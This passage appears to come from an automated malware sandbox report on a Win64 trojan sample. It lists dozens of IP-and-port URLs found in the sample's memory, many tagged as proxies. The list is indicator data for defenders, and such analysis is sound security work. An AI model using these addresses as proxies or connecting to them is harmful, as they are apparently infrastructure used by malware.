                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E1D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.61.156:23456
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.61.156:23456://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.238.245.116:8100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.238.245.116:8100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.238.247.9:8100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.238.247.9:8100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.36.112:16725
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.36.112:16725://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.9.254
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.9.254://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.9.254:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.148.63.29
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.148.63.29://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.148.63.29:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:13326
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:13326://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:13718
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:13718://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:1647
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:1647://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:16526
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:16526://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:1772
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:1772://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:2450
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:2450://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:25214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:25214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:26422
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:26422://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:2935
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:2935://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:33346
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:33346://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:33466
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:33466://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:35072
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:35072://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:35557
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:35557://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:39796
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:39796://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:40280
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:40280://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:41866
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:41866://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:41920
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:41920://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:45620
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:45620://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:47913
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:47913://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:49675
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:49675://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:57470
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:57470://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:59583
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:59583://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:60870
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:60870://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:7856
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.174.6:7856://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.238.246:24752
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.94.238.246:24752://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:24026
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:24026://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:59656
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:59656://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:27407
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:27407://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:34139
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:34139://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.226.214:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.226.214:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.228.193:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.228.193:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF21000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.232.6:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB02D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.232.6:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.239.1:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.239.1:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.222:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.222:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.239.162:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.239.162:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:25979
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:25979://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:28250
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:28250://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:33954
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:33954://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:46071
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.66.245:46071://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.110.232.177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.110.232.177://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.110.232.177:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.229.56:64961
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.229.56:64961://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.241.47
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.241.47://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.241.47:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C940C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.202.97.171:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.202.97.171:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.152.61:3180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.152.61:3180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.131.2:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.131.2:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.140.236:8444
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.140.236:8444://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.184.250:37237://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.244.184.250:37237HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.140.28:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.140.28:5678://proxy
